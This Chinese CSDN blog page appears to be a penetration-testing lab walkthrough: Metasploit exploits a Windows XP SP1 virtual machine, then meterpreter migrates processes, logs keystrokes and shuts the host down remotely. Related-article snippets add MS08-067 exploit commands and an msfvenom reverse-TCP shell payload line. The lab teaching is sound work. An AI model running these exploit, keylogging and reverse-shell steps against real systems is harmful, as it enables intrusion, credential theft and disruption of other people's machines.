Kali渗透测试——利用metasploit攻击靶机WinXP SP1

最新推荐文章于 2024-05-10 08:33:36 发布
最新推荐文章于 2024-05-10 08:33:36 发布
阅读量1.3w 收藏 55
点赞数 9
分类专栏: Kali Linux Linux 文章标签: Kali metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Noob_f/article/details/72566628
版权

搭建渗透测试环境

Kali攻击机

Kali攻击机

WinXP SP1 靶机

WinXP SP1 靶机

启动metasploit

metasploit

跟windows RPC相关的漏洞

windows RPC

内部提供的漏洞攻击

漏洞攻击

靶机winxp sp1网络配置

查看虚拟机的NAT网段

NAT网段

配置WinXP SP1靶机的IP地址

配置IP

执行漏洞利用

执行漏洞利用

后漏洞利用:meterpreter>

meterpreter

靶机的信息

靶机信息

进程情况

进程情况1
进程情况2
查看到explorer.exe的PID的2008

进程迁移

进程迁移
getpid

启动键盘记录

启动键盘记录
靶机使用键盘输入
键盘输入
获取到键盘信息
获取
again
keyscan_dump
keyscan_stop

获取主机名

getuid

执行远程关机

shutdown
XP

Uri · Boyka
关注
  • 9
    点赞
  • 55
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Metasploit 攻击winXP
Epsilon
01-06 8872
本次实验会用到以下资源: Kali linux 镜像 windows XP SP2 镜像 进入kali linux进行渗透: # msfconsole msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST TARGETIP msf exploit(ms08_
使用kali实践一个简单的winxp漏洞MS08_067
幸福诗歌的博客
01-25 2868
8-067漏洞演示与CVE-2017-11882漏洞复现 MS08_067漏洞是著名的远程溢出漏洞,影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。本次实验就是metasploit利用ms08_0...
使用kali黑掉Windows xp
qq_41426887的博客
03-13 4944
这学期老师布置了一个不算大的大作业,让我们组队做一个攻击。思来想去,作为一个小白,也只能做一些比较简单的攻击,于是就从网上找了用metasploit黑入Windows xp的方法。这里我先把需要的命令列出来,然后详细地解释每条命令的具体含义,最后再介绍一些常用的操作。 1.root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp L...
Kali Linux-网络安全之-XSS 跨站脚本攻击原理及 DVWA 靶机的搭建_kali实验xss攻击
m0_55030688的博客
05-10 870
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
搭建kaliwin xp靶机实验环境
qq_63651088的博客
03-22 1005
kali官网下载(https://www.kali.org/get-kali/#kali-bare-metal )并安装64位镜像。安装kali虚拟机,选择graphical install,图形化界面,安装完成后,虚拟机——快照———拍摄快照1,命名安装完成。当本机连接互联网后,主机IP地址如下,虚拟机使用桥接模式后,虚拟机必须配置与主机在一个网段,才可联网通信。汉化教程,配置好汉化,注意这一步要联网,可使用手机散网。设置桥接模式:在虚拟机未开启之前,菜单栏:虚拟机---设置---网络适配器。
Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)
qq_43093288的博客
03-25 1819
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。注:发现Windows XP SP2 (Simplified Chinese)存在多个漏洞:ms17-010,ms08-067,,但是我们现在只考虑ms08-067。注:发现Windows XP SP2 (Simplified Chinese)的IP:172.16.12.101。
Kali Linux渗透测试技术详解
02-19
介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限提升、密码攻击、无线网络攻击、...
Kali渗透测试技术实战
07-24
硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、生成日志和报告。 第三章 软件、补丁和升级 第四章 配置 kali 第五章渗透测试实验环境 第六章渗透测试...
50-50.渗透测试-Kali Linux漏洞利用
最新发布
05-10
50-50.渗透测试-Kali Linux漏洞利用
Kali 渗透测试 pdf
04-08
Kali 渗透测试 pdf
VM虚拟机镜像集合windowsxp ,windows 7,windows 8,linux
08-24
VM虚拟机镜像集合windowsxp ,windows 7,windows 8,linux
渗透测试新手练习及高手深入挖掘专用Linux及Windows靶机(官方原版镜像)
05-08
本人学习时使用的的这两个系统,常见的高风险漏洞较多,容易利用,适合新手练习。 metasploitable-linux为常用的Linux靶机,系统包含了很多高风险漏洞、弱口令及容易利用的端口、服务,是渗透测试初学者练习技术的不二之选。 Windows_xp_pro_with_sp2就更不用说了,都被人挖烂了,sp2版本相比sp3更简单一些,适合新手练习。
KALi 渗透测试
09-13
通过kali系统详细的介绍渗透测试过程,通过工具渗透,带来渗透测试思路
老生常谈,永恒之蓝-winxp
liuguangshibei的博客
06-24 3027
攻击机:kali 靶机windows xp sp2 靶机开放服务:无,IE浏览器版本 6.0扫描当前网段存活主机,发现目标主机:IP:192.168.2.67 攻击方式:永恒之蓝
kali linux攻击机及windowsXp/Metasploit_linux靶机安装及在此基础上的蜜罐系统搭建(上)
微光·火炬
06-20 7173
一、创建虚拟机Linux攻击机步骤: 1.下载安装好Vmware 2.创建新虚拟机——Linux攻击机       (1)点击 “ 创建新虚拟机”,出现如下视图,选择“稍后安装操作系统”,下一步 (2)选择Linux操作系统,版本选为“其他Linux3x内核64位”,下一步——>位置自选,下一步       (3)选择磁盘容量,尽量大一点
一个遭受千百次攻击的良心学习靶机网站DVWA
hackerie的博客
09-15 9987
话不多说,DVWA (Dam Vulnerable Web Application),一个供安全人员学习练手的优秀网站。以后该博客会慢慢收集类似的学习网站。希望大家共同进步!分享、学习、共同进步!
kali linux攻击机及windowsXp/Metasploit_linux靶机安装及在此基础上的蜜罐系统搭建(中)
微光·火炬
06-20 7604
二、配置靶机 1.配置Metasploitable2 linux靶机(默认登录名和密码为msfadmin:msfadmin)。 (1)VMwareWorkstation选择文件→打开,选择相应的VMX文件 (2)配置靶机虚拟机的硬件,内存建议设置为512MB(宿主内存4GB),并在硬件选项卡中选择单击网络适配器,设置为NAT模式。 (3)输入用户名和密码
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Uri · Boyka

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值